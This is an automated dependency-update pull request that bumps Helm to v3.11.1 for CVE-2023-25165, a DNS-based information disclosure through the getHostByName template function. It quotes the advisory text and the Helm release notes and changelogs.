search

stackabletech / stackablectl

Commandline tool to interact with a Stackable Data Platform
Other
8 stars 1 forks source link

chore(deps): update module helm.sh/helm/v3 to v3.11.1 [security] #296

Open stackable-bot opened 7 months ago

stackable-bot commented 7 months ago

This PR contains the following updates:

Package Type Update Change
helm.sh/helm/v3 require minor v3.10.3 -> v3.11.1

GitHub Vulnerability Alerts

CVE-2023-25165

A Helm contributor discovered an information disclosure vulnerability using the getHostByName template function.

Impact

getHostByName is a Helm template function introduced in Helm v3. The function is able to accept a hostname and return an IP address for that hostname. To get the IP address the function performs a DNS lookup. The DNS lookup happens when used with helm install|upgrade|template or when the Helm SDK is used to render a chart.

Information passed into the chart can be disclosed to the DNS servers used to lookup the IP address. For example, a malicious chart could inject getHostByName into a chart in order to disclose values to a malicious DNS server.

Patches

The issue has been fixed in Helm 3.11.1.

Workarounds

Prior to using a chart with Helm verify the getHostByName function is not being used in a template to disclose any information you do not want passed to DNS servers.

For more information

Helm's security policy is spelled out in detail in our SECURITY document.

Credits

Disclosed by Philipp Stehle at SAP.

Release Notes

helm/helm (helm.sh/helm/v3) ### [`v3.11.1`](https://togithub.com/helm/helm/releases/tag/v3.11.1): Helm v3.11.1 [Compare Source](https://togithub.com/helm/helm/compare/v3.11.0...v3.11.1) Helm v3.11.1 is a security (patch) release. Users are strongly recommended to update to this release. The template function `getHostByName` can be used to disclose information. More details are available in the [CVE](https://togithub.com/helm/helm/security/advisories/GHSA-pwcw-6f5g-gxf8). This release introduces a breaking changes to Helm: - When using the `helm` client for the `template`, `install`, and `upgrade` commands there is a new flag. `--enable-dns` needs to be set for the `getHostByName` template function to attempt to lookup an IP address for a given hostname. If the flag is not set the template function will return an empty string and skip looping up an IP address for the host. - The Helm SDK has added the `EnableDNS` property to the install action, the upgrade action, and the `Engine`. This property must be set to true for the in order for the `getHostByName` template function to attempt to lookup an IP address. The default for both of these cases is false. [Philipp Stehle](https://togithub.com/phil9909) at SAP disclosed the vulnerability to the Helm project. #### Installation and Upgrading Download Helm v3.11.1. The common platform binaries are here: - [MacOS amd64](https://get.helm.sh/helm-v3.11.1-darwin-amd64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-darwin-amd64.tar.gz.sha256sum) / 2548a90e5cc957ccc5016b47060665a9d2cd4d5b4d61dcc32f5de3144d103826) - [MacOS arm64](https://get.helm.sh/helm-v3.11.1-darwin-arm64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-darwin-arm64.tar.gz.sha256sum) / 43d0198a7a2ea2639caafa81bb0596c97bee2d4e40df50b36202343eb4d5c46b) - [Linux amd64](https://get.helm.sh/helm-v3.11.1-linux-amd64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-linux-amd64.tar.gz.sha256sum) / 0b1be96b66fab4770526f136f5f1a385a47c41923d33aab0dcb500e0f6c1bf7c) - [Linux arm](https://get.helm.sh/helm-v3.11.1-linux-arm.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-linux-arm.tar.gz.sha256sum) / 77b797134ea9a121f2ede9d159a43a8b3895a9ff92cc24b71b77fb726d9eba6d) - [Linux arm64](https://get.helm.sh/helm-v3.11.1-linux-arm64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-linux-arm64.tar.gz.sha256sum) / 919173e8fb7a3b54d76af9feb92e49e86d5a80c5185020bae8c393fa0f0de1e8) - [Linux i386](https://get.helm.sh/helm-v3.11.1-linux-386.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-linux-386.tar.gz.sha256sum) / 1581a4ce9d0014c49a3b2c6421f048d5c600e8cceced636eb4559073c335af0b) - [Linux ppc64le](https://get.helm.sh/helm-v3.11.1-linux-ppc64le.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-linux-ppc64le.tar.gz.sha256sum) / 6ab8f2e253c115b17eda1e10e96d1637047efd315e9807bcb1d0d0bcad278ab7) - [Linux s390x](https://get.helm.sh/helm-v3.11.1-linux-s390x.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.1-linux-s390x.tar.gz.sha256sum) / ab133e6b709c8107dc4f8f62838947350adb8e23d76b8c2c592ff4c09bc956ef) - [Windows amd64](https://get.helm.sh/helm-v3.11.1-windows-amd64.zip) ([checksum](https://get.helm.sh/helm-v3.11.1-windows-amd64.zip.sha256sum) / bc37d5d283e57c5dfa94f92ff704c8e273599ff8df3f8132cef5ca73f6a23d0a) This release was signed with ` 672C 657B E06B 4B30 969C 4A57 4614 49C2 5E36 B98E ` and can be found at [@​mattfarina](https://togithub.com/mattfarina) [keybase account](https://keybase.io/mattfarina). Please use the attached signatures for verifying this release using `gpg`. The [Quickstart Guide](https://helm.sh/docs/intro/quickstart/) will get you going from there. For **upgrade instructions** or detailed installation notes, check the [install guide](https://helm.sh/docs/intro/install/). You can also use a [script to install](https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3) on any system with `bash`. #### What's Next - 3.11.2 is the next patch/bug fix release and will be on March 08, 2023. - 3.12.0 is the next feature release and be on May 10, 2023. ### [`v3.11.0`](https://togithub.com/helm/helm/releases/tag/v3.11.0): Helm v3.11.0 [Compare Source](https://togithub.com/helm/helm/compare/v3.10.3...v3.11.0) Helm v3.11.0 is a feature release. Users are encouraged to upgrade for the best experience. The community keeps growing, and we'd love to see you there! - Join the discussion in [Kubernetes Slack](https://kubernetes.slack.com): - for questions and just to hang out - for discussing PRs, code, and bugs - Hang out at the Public Developer Call: Thursday, 9:30 Pacific via [Zoom](https://zoom.us/j/696660622) - Test, debug, and contribute charts: [ArtifactHub/packages](https://artifacthub.io/packages/search?kind=0) #### Notable Changes - The Helm status command and the SDK can now show the status of core resources deployed in a chart (e.g., deployments). To use with `helm status` you need to use the `--show-resources` flag. - Add support for comma separated values in template --api-versions - Allow CGO_ENABLED to be overridden when building Helm from source #### Installation and Upgrading Download Helm v3.11.0. The common platform binaries are here: - [MacOS amd64](https://get.helm.sh/helm-v3.11.0-darwin-amd64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-darwin-amd64.tar.gz.sha256sum) / 5a3d13545a302eb2623236353ccd3eaa01150c869f4d7f7a635073847fd7d932) - [MacOS arm64](https://get.helm.sh/helm-v3.11.0-darwin-arm64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-darwin-arm64.tar.gz.sha256sum) / f4717f8d1dab79bace3ff5d9d48bebef62310421fd479205ef54a56204f97415) - [Linux amd64](https://get.helm.sh/helm-v3.11.0-linux-amd64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-linux-amd64.tar.gz.sha256sum) / 6c3440d829a56071a4386dd3ce6254eab113bc9b1fe924a6ee99f7ff869b9e0b) - [Linux arm](https://get.helm.sh/helm-v3.11.0-linux-arm.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-linux-arm.tar.gz.sha256sum) / cddbef72886c82a123038883f32b04e739cc4bd7b9e5f869740d51e50a38be01) - [Linux arm64](https://get.helm.sh/helm-v3.11.0-linux-arm64.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-linux-arm64.tar.gz.sha256sum) / 57d36ff801ce8c0201ce9917c5a2d3b4da33e5d4ea154320962c7d6fb13e1f2c) - [Linux i386](https://get.helm.sh/helm-v3.11.0-linux-386.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-linux-386.tar.gz.sha256sum) / fad897763f3b965bc4d75c8f95748ebc0330a5859d9ea170a4885571facacdb1) - [Linux ppc64le](https://get.helm.sh/helm-v3.11.0-linux-ppc64le.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-linux-ppc64le.tar.gz.sha256sum) / 6481a51095f408773212ab53edc2ead8a70e39eba67c2491e11c4229a251f9b5) - [Linux s390x](https://get.helm.sh/helm-v3.11.0-linux-s390x.tar.gz) ([checksum](https://get.helm.sh/helm-v3.11.0-linux-s390x.tar.gz.sha256sum) / 3c420f13d12ca9e7302715d40a00466a145a2dff7f14714e11a5aeadb1d67919) - [Windows amd64](https://get.helm.sh/helm-v3.11.0-windows-amd64.zip) ([checksum](https://get.helm.sh/helm-v3.11.0-windows-amd64.zip.sha256sum) / 55477fa4295fb3043835397a19e99a138bb4859fbe7cd2d099de28df9d8786f1) This release was signed with ` F126 1BDE 9290 12C8 FF2E 501D 6EA5 D759 8529 A53E ` and can be found at [@​hickeyma](https://togithub.com/hickeyma) [keybase account](https://keybase.io/hickeyma). Please use the attached signatures for verifying this release using `gpg`. The [Quickstart Guide](https://helm.sh/docs/intro/quickstart/) will get you going from there. For **upgrade instructions** or detailed installation notes, check the [install guide](https://helm.sh/docs/intro/install/). You can also use a [script to install](https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3) on any system with `bash`. #### What's Next - 3.11.1 is the next patch/bug fix release and will be on February 08, 2023. - 3.12.0 is the next feature release and be on May 10, 2023. #### Changelog - Fix improper use of Table request/response to k8s API [`472c573`](https://togithub.com/helm/helm/commit/472c5736ab01133de504a826bd9ee12cbe4e7904) (Matt Farina) - Check status code before retrying request [`ee1ec6e`](https://togithub.com/helm/helm/commit/ee1ec6e432fe3b1943a291e59990becb5fe046ae) (Cenk Alti) - bump version to v3.11.0 [`9d8fee1`](https://togithub.com/helm/helm/commit/9d8fee155bd7e7d3c1390f4076d9271a1147dce5) (Matt Farina) - Bump containerd to 1.6.15, oras-go to 1.2.2 and image-spec to v1.1.0-rc2 [`017785a`](https://togithub.com/helm/helm/commit/017785a2f1104eb4299f8d31feb550c213350f13) (Luca Comellini) - change linting error messages for null values in arrays [`6a5f240`](https://togithub.com/helm/helm/commit/6a5f240e9a22cf5ef3a889764079873a9cd537a4) (Daniel Strobusch) - Fix after CR [`3d81ea2`](https://togithub.com/helm/helm/commit/3d81ea22ac74e667b98a26eb80a5d427d75f7009) (Jakub Warczarek) - Trigger CI [`f46ff13`](https://togithub.com/helm/helm/commit/f46ff131c2ca169d25f9b8f8d550f6c320b48048) (Jakub Warczarek) - Add test for User-Agent header setting and refactor [`553f1e3`](https://togithub.com/helm/helm/commit/553f1e34f54ce4c75ee10b53c441063d6303db3c) (Jakub Warczarek) - Fix User-Agent header in requests made by Helm [`2fa7b3d`](https://togithub.com/helm/helm/commit/2fa7b3d1b7a289690ccc2c820b3329c6b07a1458) (Jakub Warczarek) - Bump k8s.io deps to v0.26.0 [`1fc2a6a`](https://togithub.com/helm/helm/commit/1fc2a6a39ccedd9d11c9839853a95d28ca35294f) (Luca Comellini) - fix adopted resource not replaced [`3181c7d`](https://togithub.com/helm/helm/commit/3181c7ddadd2271d67a457522abc13410929b64c) (Vaibhav Sharma) - chore(deps): bump github.com/BurntSushi/toml from 1.2.0 to 1.2.1 [`8774890`](https://togithub.com/helm/helm/commit/8774890e7edadbab88f35e6536393cf791b183f0) (dependabot\[bot]) - Resolve conflicts for go.mod and go.sum [`6c76abb`](https://togithub.com/helm/helm/commit/6c76abb3df72df415dd54b9a09ce26fcee8fad95) (Soujanya Mangipudi) - Fix backwards compatibility [`b6fef6c`](https://togithub.com/helm/helm/commit/b6fef6c4665130644acf7742040ebd46f9cc957c) (Martin Hickey) - docs: add docs for cli/values.Options [`0fdfe05`](https://togithub.com/helm/helm/commit/0fdfe0584437112e11fdfa6775625451442f6c91) (Zuhair AlSader) - Update chartrepo.go [`c8890e9`](https://togithub.com/helm/helm/commit/c8890e971e50a305dc8a83029fa882ee255007b2) (caixisheng) - chore(deps): bump golang.org/x/text from 0.4.0 to 0.5.0 [`b307d0f`](https://togithub.com/helm/helm/commit/b307d0fbeb42fe890450d8d3de2291817ad9b4cb) (dependabot\[bot]) - bump sprig version 3.2.3 [`fda1a0b`](https://togithub.com/helm/helm/commit/fda1a0b10a87845b3cbe58434089f0def4220f53) (yxxhero) - Update string handling [`a59e584`](https://togithub.com/helm/helm/commit/a59e58468430bf9b454426ff22f5f367185b7d77) (Martin Hickey) - Update repo handling [`256e976`](https://togithub.com/helm/helm/commit/256e976331db4b7335ef721e411e7b59c5317ccb) (Martin Hickey) - improve error message on plugin install [`965f859`](https://togithub.com/helm/helm/commit/965f8591e7eab685186626bf7e64b4c24b384c39) (Philipp Stehle) - harmonize URL reference resolving [`dfb25e1`](https://togithub.com/helm/helm/commit/dfb25e13deba70eafe607748cd83bdda5409d245) (Philipp Stehle) - Update logic of non-git situation just to print warning logs [`0ebd620`](https://togithub.com/helm/helm/commit/0ebd6202d8fb1fb334a7670896d6a97cc736688c) (Wonyeong Choi) - Add a flag var to check git is installed or not [`c027014`](https://togithub.com/helm/helm/commit/c0270140197f459979ff21a618729afb844a854a) (Wonyeong Choi) - Add support for CSVs in template --api-versions arg [`5aa316e`](https://togithub.com/helm/helm/commit/5aa316e1eec883878262a01f36a7fcf6ffd7f641) (Ryan Drew) - update .golangci for go1.18 [`61374f6`](https://togithub.com/helm/helm/commit/61374f655467485673dd87a8c0cbe871d4f28175) (yanggang) - redirect registry client output to stderr [`1535ad5`](https://togithub.com/helm/helm/commit/1535ad56716d21a8b5fc93354a9ac91ba9d696ab) (Cyril Jouve) - chore(deps): bump github.com/spf13/cobra from 1.5.0 to 1.6.1 [`b3afe43`](https://togithub.com/helm/helm/commit/b3afe432784baf5300b876b9d03456d256f93574) (dependabot\[bot]) - Readiness & liveness probes correct port [`9d027ea`](https://togithub.com/helm/helm/commit/9d027eaac894e1793c663448cfd494bcc21c759f) (Peter Leong) - Update schema validation handling [`775af2a`](https://togithub.com/helm/helm/commit/775af2a0ceadef1bc8f627cdb70fadb3c69b8d86) (Martin Hickey) - fix a few function names on comments [`09d3f31`](https://togithub.com/helm/helm/commit/09d3f31358882970d02018bd84bcbcd28b47f986) (cui fliter) - use intstr.GetScaledValueFromIntOrPercent instead of the deprecated [`9d59d92`](https://togithub.com/helm/helm/commit/9d59d92abb462d6f59b77ee1099b18067e561932) (Qifan Shen) - Updating the deb location for azure cli [`70a3df4`](https://togithub.com/helm/helm/commit/70a3df49d702e23ad29367783a5655350be90265) (Matt Farina) - retry http request on temporary errors [`b5378b3`](https://togithub.com/helm/helm/commit/b5378b3a5dd435e5c364ac0cfa717112ad686bd0) (Cenk Alti) - Revert "Tolerate temporary errors from etcdserver" [`d32c623`](https://togithub.com/helm/helm/commit/d32c623699de24ac49653a6ec561485ce122d530) (Cenk Alti) - Updating the repo the azure cli is installed from [`9fbf1b3`](https://togithub.com/helm/helm/commit/9fbf1b34d5aa34c5774b56247ddd9ae96145f767) (Matt Farina) - Updating to kubernetes 1.25.2 packages [`221b0f5`](https://togithub.com/helm/helm/commit/221b0f54c912ce5d9dbb5eb5b10b62f411e2589b) (Matt Farina) - Allow CGO_ENABLED to be overridden for build [`6f6c0d8`](https://togithub.com/helm/helm/commit/6f6c0d831d69a133c4100a79838c57bcb4d551d4) (Joe Julian) - chore(deps): bump github.com/sirupsen/logrus from 1.8.1 to 1.9.0 [`98077dd`](https://togithub.com/helm/helm/commit/98077dd340ebcbf8c2271b5fd8f8c831dea82a88) (dependabot\[bot]) - chore(deps): bump github.com/lib/pq from 1.10.6 to 1.10.7 [`bfd1890`](https://togithub.com/helm/helm/commit/bfd189000e95ff67e226dc434bdcecc2a5a3351d) (dependabot\[bot]) - chore(deps): bump github.com/BurntSushi/toml from 1.1.0 to 1.2.0 [`1478a09`](https://togithub.com/helm/helm/commit/1478a098f1619fd5d3372252f2e1caf3a260a50d) (dependabot\[bot]) - chore(deps): bump github.com/rubenv/sql-migrate from 1.1.2 to 1.2.0 [`4376d2f`](https://togithub.com/helm/helm/commit/4376d2fa85a6be10d12dc2b6e6d5377b6e675b78) (dependabot\[bot]) - Tolerate temporary errors from etcdserver [`ebc79fa`](https://togithub.com/helm/helm/commit/ebc79fa807f29b984e090f0071b640f7347937cf) (Davanum Srinivas) - update: Optimize the error message [`4fcec24`](https://togithub.com/helm/helm/commit/4fcec24d15c616011fb2d7c22c3dd0024bb9e41b) (wujunwei) - add nil judge for dependency , maintainers validate and some testcase. [`a7a1117`](https://togithub.com/helm/helm/commit/a7a11173271e5721078994647caf856489dfd929) (wujunwei) - Fix code style [`ae828ce`](https://togithub.com/helm/helm/commit/ae828ce0ee0f0ad48482cc9fd773c28b137dd23d) (Martin Hickey) - bump version to v3.10.0 [`cd809f9`](https://togithub.com/helm/helm/commit/cd809f9b1953a180de6f532c0ad19c625afa7ced) (Matt Farina) - Addressing review comments - move printing code out of client.go [`ffa19a4`](https://togithub.com/helm/helm/commit/ffa19a4b5d836283a91a4c16f8b81e734a973afc) (Soujanya Mangipudi) - Addressing review comments: Extend Interface with new InterfaceResources to avoid breaking changes Move change to staus command behind --show-resources flag [`20e3577`](https://togithub.com/helm/helm/commit/20e35775439c699bdd5c8fdc228ebe57a4b9c002) (Soujanya Mangipudi) - feat(helm): Supporting helm3 to show up resource names that were deployed as part of release in helm status command [`9d5be80`](https://togithub.com/helm/helm/commit/9d5be803bc0d408944f6b30c98a05c4026abc6e2) (Soujanya Mangipudi) - During deletion, explicitly log already deleted resource name. [`b7c35d2`](https://togithub.com/helm/helm/commit/b7c35d2a0f2ba8920cbae41dab5b054ac6e61c53) (Marcin Owsiany) - fix: add cases.NoLower option for we can get same effect to strings.Title [`f0037e5`](https://togithub.com/helm/helm/commit/f0037e5ef6bb118dbcd6e26497014b97436888d6) (wujunwei) - one defer [`3b19dde`](https://togithub.com/helm/helm/commit/3b19ddeb56fae17a1d176130702ae5b779b20460) (CI) - don't change r.CachePath [`781ddba`](https://togithub.com/helm/helm/commit/781ddba690afa20c80f443a121c3134f668dc43a) (CI) - avoid adding new public function [`cd76fcd`](https://togithub.com/helm/helm/commit/cd76fcd80557490d2f2ee1204b1bdbf78c738ec9) (CI) - fix tests [`32a41fc`](https://togithub.com/helm/helm/commit/32a41fcfac9ca1b4f4997a6660bacba9a01a9d45) (CI) - fix: clean up temp files in FindChartInAuthAndTLSAndPassRepoURL ([#​11171](https://togithub.com/helm/helm/issues/11171)) [`24fa3d9`](https://togithub.com/helm/helm/commit/24fa3d910d774b9d7f40f1fc8002bc1fb55565ca) (CI) - Fix URL with encoded path support for ChartDownloader [`d9e5bbc`](https://togithub.com/helm/helm/commit/d9e5bbc09d4d44660fe20df41ce3b567f0336f85) (Mathieu Parent)

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Berlin, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

This PR has been generated by Renovate Bot.